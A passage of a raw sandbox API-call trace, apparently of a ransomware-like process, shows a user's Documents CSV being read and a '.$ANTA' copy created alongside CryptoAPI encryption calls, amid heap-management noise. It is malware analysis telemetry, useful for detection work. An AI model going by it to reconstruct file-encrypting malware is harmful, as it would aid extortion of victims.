Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796d68 [0076.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.758] CryptDestroyHash (hHash=0x41ac700) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0076.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.759] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv" (normalized: "c:\\users\\fd1hvy\\documents\\hd2ussjorg1byp.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.759] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.759] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.759] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0076.760] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.760] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\hd2ussjorg1byp.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.761] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0076.762] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.766] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.766] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x6cbd, lpOverlapped=0x0) returned 1 [0076.767] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0076.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0076.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.770] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.771] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.771] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.772] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.772] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.772] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.775] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 